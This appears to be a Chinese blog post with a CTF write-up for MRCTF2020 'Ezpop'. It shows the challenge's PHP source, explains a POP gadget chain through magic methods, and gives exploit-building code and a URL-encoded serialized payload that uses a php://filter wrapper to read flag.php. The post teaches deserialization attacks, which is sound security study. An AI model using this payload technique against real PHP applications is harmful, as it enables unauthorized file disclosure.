[MRCTF2020]Ezpop

先放源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

先补充几个题目用到的魔术方法触发条件
__construct()//当一个对象创建时被调用
__toString() //当一个对象被当作一个字符串使用
__wakeup()//将在反序列化之后立即被调用
__get()//获取一个类的私有属性,或者获取一个类并为定义的属性时会被调用
__invoke()//调用函数的方式调用一个对象时的回应方法

这里主要讲解通读代码后的解题思路,不对类中具体函数参数做说明

想要弄清利用链必须逆向思维,题目入手点很明显的Modifier类中的append方法,该方法会包含Modifier类中var属性,所以$var=flag.php这里很清晰,append方法又被魔术方法__invoke调用,也就是说Modifier这个类必须得被当作函数执行,发现Test类中__get魔术方法会调用变量p作为函数使用,所以$p=一个Modifier类,那么想调用__get方法只有获取Test类中不存在的属性才会触发,我们注意到show类中的方法__tostring中的返回this->str->source,这里很明显是个提示,str属性一定是个类(),所以我们让str=一个Test类,在访问test->source时source不存在与类Test中就会触发_get函数,那么最后一步就是确认如何触发_toString函数,看__wakeup魔术方法,这个方法将source进行正则比较,如果source不是字符串就会调用__toString方法将其转换为字符串进行比较,所以为了既能调用_toString函数又能使str=一个Test类,我们让source=new show(),注意_toString函数里的this 应该是this->source,因为是this->source需要做处理而调用的__toString函数,这样利用链就完成了,我们在正向梳理一下
__wakeup()-->__toString()-->__get-->__invoke-->append
代码如下:

<?php

class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";

}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;

    }

    
$a =new Modifier();
$b = new Show();
$b->source=new Show();
$b->source->str=new Test();
$b->source->str->p=$a;
echo urlencode(serialize($b));

注:php需要伪协议读取,不是此题重点不解释

payload:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

base64解码即可获取答案

posted @ 2024-11-05 18:00  m1saka1  阅读(7)  评论(0编辑  收藏  举报